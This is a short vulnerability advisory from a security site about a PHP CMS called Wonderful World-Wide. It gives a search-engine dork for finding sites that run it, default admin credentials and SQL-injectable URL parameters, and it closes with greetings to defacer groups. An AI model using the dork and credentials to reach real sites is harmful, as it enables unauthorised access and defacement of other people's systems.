Wonderful World-Wide CMS SQL Injection / Default Credentials

2014.10.24
Credit: eX-Sh1Ne
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: \"Copyright © 2011 Wonderful World-wide All rights reserved.\" site:

#Title : Wonderful World-wide CMS Multiple Vulnerability #Author : eX-Sh1Ne #Facebook : fb..me/ShiNe.gov // fb.com/EksShiNe #Date : 24/10/2014 #Category : Web Applications #Type : PHP #Vendor : n/a #Download : n/a #Greetz : Java Defacer Team - Sanjungan Jiwa - All Indonesian Defacer Team #Thanks : Admin07, pr0blemnymouz, FH04ZA, Black Style, AntonioHsH, Ice-Cream, Tintonz, Freezer22, Basreng, RECOD3D, Adr404Elite, sh0uT0u7, Mr-Avi, Bang Bros / Gayus. #Tested : Mozila, Chrome-> Windows #Dork : "Copyright © 2011 Wonderful World-wide All rights reserved." site: ================================================================== Default Login Admin Google > Find Target Go To > http://localhost/admin/ Login with : Admin : admin ================================================================== SQL Injection http://localhost/visa_detail.php?id='2 http://localhost//search.php?country=0&type1=0&type2=1&type3=0) many more. ================================================================== Indonesian Defacer here. // Done.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top